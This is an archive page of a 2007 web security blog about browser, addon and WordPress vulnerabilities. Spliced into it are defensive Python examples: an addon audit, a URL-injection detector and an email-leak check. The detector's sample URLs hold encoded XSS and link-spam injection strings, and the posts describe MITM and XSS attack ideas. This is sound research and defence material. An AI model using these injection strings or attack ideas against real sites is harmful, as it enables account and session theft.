web application security lab

Archive for May, 2007

Google Desktop 0day

Thursday, May 31st, 2007

Well, fast on the heels of the Firefox plugin MITM vulnerabilities I’ve been working on some other stuff that I think is interesting and of the same genre. This time I came up with a MITM exploit against Google Desktop that would allow an attacker to trick a user into running any program they have installed and that was indexed by Google Desktop. Nasty. I have a pretty thorough writeup and a sample video (please read the text before you launch the video or it won’t make much sense).

Using something like Airpwn an attacker can sit in a wireless hotspot and wait for someone who has Google Desktop installed (since we can detect for that) and run the exploit against them. It could be done as a prank or something malicious. The point being that this type of deep integration between the web and client-side applications is really dangerous and breaks the security models put in place by the browsers.

Hacking Your Teachers For Credit

Wednesday, May 30th, 2007

I found this interesting link in my logs to the University of Washington’s CS department coursework. Apparently their assignment (due tomorrow) is to actually get their professors to give up their fake credentials by getting them to click on links. Pretty interesting actually! I’m surprised to see this kind of stuff being taught, but I’m really glad too, because a lot of what XSS is is input validation basics. It’s exactly the sort of thing that needs to be taught in CS classes, and it’s one that has somehow evaded most schools.

The intense irony in finding this is not lost on me though - I actually failed out of school and now my site is recommended course reading for CSE 490K (an advanced CS class). Maybe I should ask for course credit! Now don’t go and help the students! They have to learn this stuff for themselves! ;)

Remote Firefox Vulnerabilities

Wednesday, May 30th, 2007

Brian Krebs at the Washington Post had a story about a post by Chris Soghoian who found that you can use a MITM attack to overwrite addons in Firefox. Actually, believe it or not, I was planning on releasing the exact same issue, but alas, that’s what I get for waiting. More than one person heard me say this, and I even sent Jeremiah a PowerPoint deck on this exact thing last night, and even mentioned it in passing during my OWASP talk yesterday, so I’m not just blowing smoke, but alas, Chris disclosed it first so he wins, and good for him. Chris did a good job of explaining it in gory detail too. While most addons are put on addons.mozilla.org there are quite a few that are pulled straight from http connections. There’s a great idea - let’s run arbitrary code from untrusted resources!

The offenders range from big companies like Google, Yahoo, and Facebook, to security software like Netcraft’s toolbar and the Phishtank’s toolbar down to little addons like Bugmenot and Localrodeo. If you use Firefox and are at all concerned about man-in-the-middle attacks over wireless connections, it’s time to uninstall those addons. If you use a laptop and have those addons installed you are taking a big risk of complete compromise. Yes, this is nasty. Daniel Veditz said they would have expected people would have known better. This is sort of one of those things that if you don’t warn people at a minimum they won’t know to think twice. Mozilla may “block” all unsecured content. While I don’t think that’s a great idea, at least they could warn people about what they are doing. Good work by Chris - I just wish I had disclosed it first!
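Before uninstalling everything, it is worth knowing which of your addons actually fetch updates over plain http. An addon's update location lives in its install.rdf manifest (in the profile's extensions directory), either as an em:updateURL element or as an attribute on the Description node; no entry means the addon relies on Firefox's default update service. The audit below is an added example, not code from this post or from Mozilla; the manifests it parses are constructed samples with made-up addon ids, and you would point it at your own install.rdf files instead.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Namespaces used by Firefox install.rdf manifests
RDF_NS = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
EM_NS = "http://www.mozilla.org/2004/em-rdf#"


def manifest(addon_id, update_element="", desc_attr=""):
    """Build a constructed install.rdf (sample data, not a real add-on)."""
    return f"""<RDF xmlns="{RDF_NS}" xmlns:em="{EM_NS}">
  <Description about="urn:mozilla:install-manifest"{desc_attr}>
    <em:id>{addon_id}</em:id>
    <em:version>1.0</em:version>
    {update_element}
  </Description>
</RDF>"""


# Constructed sample manifests covering the cases an auditor will meet
SAMPLE_MANIFESTS = {
    "https-addon": manifest(
        "https@example.invalid",
        "<em:updateURL>https://updates.example.invalid/https.rdf</em:updateURL>"),
    "plain-http-addon": manifest(
        "plain@example.invalid",
        "<em:updateURL>http://updates.example.invalid/plain.rdf</em:updateURL>"),
    "attribute-form-addon": manifest(
        "attr@example.invalid",
        desc_attr=' em:updateURL="http://updates.example.invalid/attr.rdf"'),
    "no-updateurl-addon": manifest("none@example.invalid"),
}


def find_update_url(manifest_xml):
    """Return the em:updateURL from a manifest, or None when it has none."""
    root = ET.fromstring(manifest_xml)
    desc = root.find(f"{{{RDF_NS}}}Description")
    if desc is None:
        return None
    element = desc.find(f"{{{EM_NS}}}updateURL")
    if element is not None and element.text and element.text.strip():
        return element.text.strip()
    # Some manifests carry the value as an attribute of Description instead
    return desc.get(f"{{{EM_NS}}}updateURL")


def classify_update_url(update_url):
    """Label the transport the addon uses to look for updates."""
    if update_url is None:
        return "default"  # no override: Firefox's default update service is used
    scheme = urlparse(update_url).scheme.lower()
    if scheme == "https":
        return "https"
    if scheme == "http":
        return "insecure-http"  # updates can be swapped by anyone on the path
    return "other"


def audit_manifests(manifests):
    """Map each addon name to the classification of its update channel."""
    return {name: classify_update_url(find_update_url(xml))
            for name, xml in manifests.items()}


def insecure_addons(manifests):
    """Names of the addons that would accept an update served over plain http."""
    return sorted(name for name, verdict in audit_manifests(manifests).items()
                  if verdict == "insecure-http")


if __name__ == "__main__":
    for name, verdict in audit_manifests(SAMPLE_MANIFESTS).items():
        print(f"{name}: {verdict}")
    print("uninstall or replace:", insecure_addons(SAMPLE_MANIFESTS))
```

To run it against a real profile, read each extensions/*/install.rdf into the dictionary in place of the samples; anything reported as insecure-http is an addon whose next update can be replaced by whoever controls the hotspot you are on.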

Is XSS Good For SEO?

Wednesday, May 30th, 2007

There’s an interesting post over at Venture Skills blog talking about whether XSS is actually good for SEO purposes. While I don’t have any conclusive evidence that he is wrong or right (at least nothing that makes me satisfied by saying that is a correct or incorrect assessment), I will say I have seen evidence that blackhats definitely are using this and search engines definitely are indexing them.

I have also heard blackhats say that it works best when used as a “spice” within a mix of a lot of other normal links, rather than relying on them entirely. Again, I have no evidence that that is true or not, but I wouldn’t refute other people’s experience without evidence. One thing I think is important to mention is that XSS as it stands is NOT good for SEO, nor could it be. What blackhats use is HTML injection, not JavaScript injection. Also, it should be noted that XSS takes on three forms, only one of which is almost hopeless for a search engine to prevent, and that is stored XSS. What I will say is it should be pretty easy for search engines to set up rules looking for commonly used reflected HTML injection techniques and devalue them.
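The kind of crawler-side rule the last sentence has in mind is simple: a reflected HTML injection has to travel in the URL itself, so a link whose query string decodes to markup (an anchor tag with an href, an iframe, a script tag) is one a search engine can spot before it ever counts the link. The checker below is an added example, not code from the post or from any search engine; the URLs it classifies are constructed samples on made-up hosts, and it decodes parameters more than once because spam links are often double-encoded to get past a single pass of filtering.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A tag: "<", optional "/", a name, optional attributes, then ">"
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)(?:\s[^>]*)?/?\s*>", re.DOTALL)
# An anchor carrying an href, the payload of link-spam injections
LINK_RE = re.compile(r"<\s*a\b[^>]*\bhref\s*=", re.IGNORECASE | re.DOTALL)
# Tags worth acting on; plain text comparisons like "a<b and c>d" never hit these
SUSPECT_TAGS = {"a", "script", "iframe", "img", "meta", "link", "div",
                "span", "font", "marquee", "object", "embed", "form"}


def decode_param(value, rounds=3):
    """Undo repeated percent-encoding (parse_qsl already removed one layer)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def injected_markup(url):
    """List (parameter, tags, carries_link) for every parameter holding markup."""
    findings = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = decode_param(raw)
        tags = {m.group(1).lower() for m in TAG_RE.finditer(value)} & SUSPECT_TAGS
        if tags:
            findings.append((name, sorted(tags), bool(LINK_RE.search(value))))
    return findings


def should_devalue(url):
    """True when a crawler should not credit the link target for this URL."""
    return bool(injected_markup(url))


# Constructed sample URLs (hosts are placeholders, not real sites)
SAMPLE_URLS = {
    "clean search": "http://example.invalid/search?q=cross+site+scripting&page=2",
    "link spam": ("http://example.invalid/search?q=%3Ca+href%3D%22http%3A%2F%2F"
                  "spam.example%2F%22%3Echeap+pills%3C%2Fa%3E"),
    "script injection": "http://example.invalid/page?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E",
    "double encoded": ("http://example.invalid/r?u=%253Ciframe%2520src%253D%2522"
                       "http%253A%252F%252Fspam.example%252F%2522%253E"),
    "comparison text": "http://example.invalid/calc?expr=a%3Cb+and+c%3Ed",
}


if __name__ == "__main__":
    for label, url in SAMPLE_URLS.items():
        print(f"{label}: devalue={should_devalue(url)} {injected_markup(url)}")
```

The carries_link flag separates the SEO case (an anchor with an href, which is what the post says blackhats actually use) from the script case, which harms the user but does nothing for rankings; a crawler would devalue both, but only the first is evidence of link manipulation.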

Google Files On the Internet

Wednesday, May 30th, 2007

Ronald had a really good post about how Google’s files were open to the world. A few people messaged me and said they were surprised I didn’t jump on it the second it was mentioned. Yah, I know, I probably should have, but get this, I actually felt sorry for Google. I know, call me a big softy. And it’s not because I’m working for Google, so don’t get your panties in a bunch here.

But no, think about the vast surface area that Google has to protect. It’s incredible when you think about it. Missing a single file permission can really ruin your day when you are a multi-national corporation. Okay, enough coddling Google, let me go back to my hard-line stance. Google has a responsibility to be better about this than most people. Why? Because they have more market share. They cannot mess up. They don’t have the right to.

If some tiny mom and pop web-store has this issue it’s bad. If Google has it, it could affect hundreds of millions of people. Sorry, that’s just not allowed. This was a security 101 mistake, and it’s unknown what sort of damage it could have caused. The fact that this has not already shown up on Google’s new security blog is testament to how impotent it probably will end up being. It’s tough to talk about your own problems when you’re the best and the brightest. That’s a big pill to swallow.

PlayStation 3 Hacking

Monday, May 28th, 2007

Anathema sent me a link to a few posts he made to discuss PlayStation 3 hacking. This post is on possible PlayStation 3 exploits and this one is on PlayStation denial of service and memory exhaustion. Why do I care, you ask? Clearly I’m not a hardware guy and I can’t remember the last time I bought a video game. But, I am interested because the PlayStation 3 has an integrated browser (based off the NetFront browser).

The reason this is interesting to me is because more and more devices are becoming web enabled. Whether that means they run webservers or have browsers built into them, the point is the same. They are sitting out there, making or taking requests from who knows where, with unknown protection and with unknown ability to do or perform other actions. Let’s say for a second that PS3 was sitting behind a firewall of someone who worked at supersecurecompany.com and they use a VPN only to connect to their company. Now that I am running my code on that system, I could theoretically break into other machines on the network much easier since I am behind the firewall. This is far more nasty than I think most people realize. It might be a video game console but if it is web enabled and running over a shared internet line it should be just as secure as anything else.

APWG and OpenDNS

Saturday, May 26th, 2007

After reading a comment by David Ulevitch on a post by Dragos Lungu I was pretty interested in reading a new press release from OpenDNS on how they are “partnering” with the Anti-Phishing Working Group (APWG). I actually laughed when I read it for a few reasons. Firstly, if you read Dave Jevans’ comment he says, “We are pleased to welcome PhishTank.com as a member of the APWG.” To me that seems less like a partner and more like a client. I couldn’t find any supporting words on APWG’s website at all to confirm a partnership in any capacity. To me it sounds like OpenDNS is simply going to consume data from APWG.

Secondly, this affirms what I was trying to get across in my comments on my post about the phishtank’s competitive nature with APWG. Although David Ulevitch never answered my questions posed to him in the comments, this pretty much sums up what I was saying. Unless these players start working together, they are only causing more churn in the industry as more companies have to deal with more anti-phishing aggregators. That in turn means that companies trying to protect themselves or their consumers have to build more APIs, sign more contracts or whatever, just to get the global knowledge of where phishing sites are. So, ultimately this sounds like a good thing, although I’m skeptical of how much of a partnership this really is, given Dave Jevans’ comments. It sounds more like they are just a simple consumer/submitter, just like the other APWG members, but the press release may also just be poorly written.

Email Address Obfuscation Woes

Friday, May 25th, 2007

This will be a quick post as it was more just something I laughed at when I saw it. I ran across an obfuscation inconsistency that made me laugh out loud. If you click on one of Security Focus’s posts you’ll see something like this:

Cold Fusion Scan
by icos (at) arez (dot) com [email concealed]

Then if you click on the threaded version of the same post you see this:

Cold Fusion Scan
by icos@arez.com

A silly mistake that is happily leaking the email addresses of everyone who posts to the mailing lists to spiders and robots. Wonder why you are getting so much spam? Hope they fix this, not that it makes much difference now. Time to retire that email address!
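The root cause here is two rendering paths for the same field, only one of which obfuscates, and the cheap guard against it is a scan of rendered output for anything that still looks like a raw address. The snippet below is an added example, not Security Focus code: one concealment routine that every view should share, plus a regression check that reports which views leak. The two view texts are constructed from the excerpts quoted above; the pattern is deliberately loose, since a false alarm costs a glance and a miss costs an address.

```python
import re

# A plain, unobfuscated e-mail address that survived into rendered output
EMAIL_RE = re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b")


def conceal(address):
    """Obfuscate an address the same way the concealed view on the page does."""
    local, _, domain = address.partition("@")
    return f"{local} (at) {domain.replace('.', ' (dot) ')}"


def render_author_line(address):
    """The single rendering path both the flat and threaded views should call."""
    return f"by {conceal(address)} [email concealed]"


def leaked_addresses(rendered_text):
    """Every raw address present in a rendered page or fragment."""
    return sorted(set(EMAIL_RE.findall(rendered_text)))


def leaking_views(views):
    """Names of the views whose rendered output still contains raw addresses."""
    return sorted(name for name, text in views.items() if leaked_addresses(text))


# Constructed snippets of the two views, mirroring the excerpts in the post
VIEWS = {
    "flat": "Cold Fusion Scan\nby icos (at) arez (dot) com [email concealed]\n",
    "threaded": "Cold Fusion Scan\nby icos@arez.com\n",
}

# What both views look like once they share render_author_line
FIXED_VIEWS = {name: "Cold Fusion Scan\n" + render_author_line("icos@arez.com") + "\n"
               for name in VIEWS}


if __name__ == "__main__":
    print("leaking views before the fix:", leaking_views(VIEWS))
    print("leaking views after the fix:", leaking_views(FIXED_VIEWS))
```

Run over the real site's pages the same check would have flagged the threaded view immediately; whether obfuscation of this sort actually slows down harvesters is a separate question, but at least it should be applied consistently.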

Wordpress Vulns

Thursday, May 24th, 2007

As I’m getting more and more divergent from the original Wordpress codebase, I am finding more and more things wrong with it. So expect more of these as I dissect the code. Frankly, I’m pretty appalled at how a lot of it is written - you’d think after all these years the shock of how people code would wear off on me, but it never does. Anyway, in the latest round of me cleaning up the code, I found a few more vulnerabilities. I have no idea what versions this affects, so your mileage may vary. Here are the two XSS exploits against logged in administrators (this version of the exploit works only against Firefox, but you could easily modify it for IE too):


If an attacker could get the administrators to click on this link it could allow the attacker to steal cookies, read nonces for writing posts, moderating comments, writing their own PHP files, or worse. This isn’t really news, except that I want to make it clear for those of you who use Wordpress because you see me using it that I’m no longer using the same code base, any of the included JS/WYSIWYG stuff or any of the modules. With all the vulnerabilities over the last few months and the constant upgrading, I just don’t trust it as a reliable platform anymore. So welcome to ha.CkersPress. :)

More Firefox JavaScript in Headers

Wednesday, May 23rd, 2007

This morning I thought I had a great idea, but it turns out I didn’t. I thought you may be able to include malicious JavaScript into any board that allows images, by modifying the headers to contain JavaScript. It turns out that was a wild goose chase. However, I was able to get JavaScript to render in headers of things like images; click here to see the demo (follow the instructions on the page).

I can’t see any simple way to exploit this directly, other than by social engineering people to go to images that look otherwise benign. When images are too small to be seen properly, people will often include a link to enlarge to the original size, and that would allow you to run JS in Firefox through the headers. Anyway, maybe someone else can think of something useful to do with this beyond social engineering.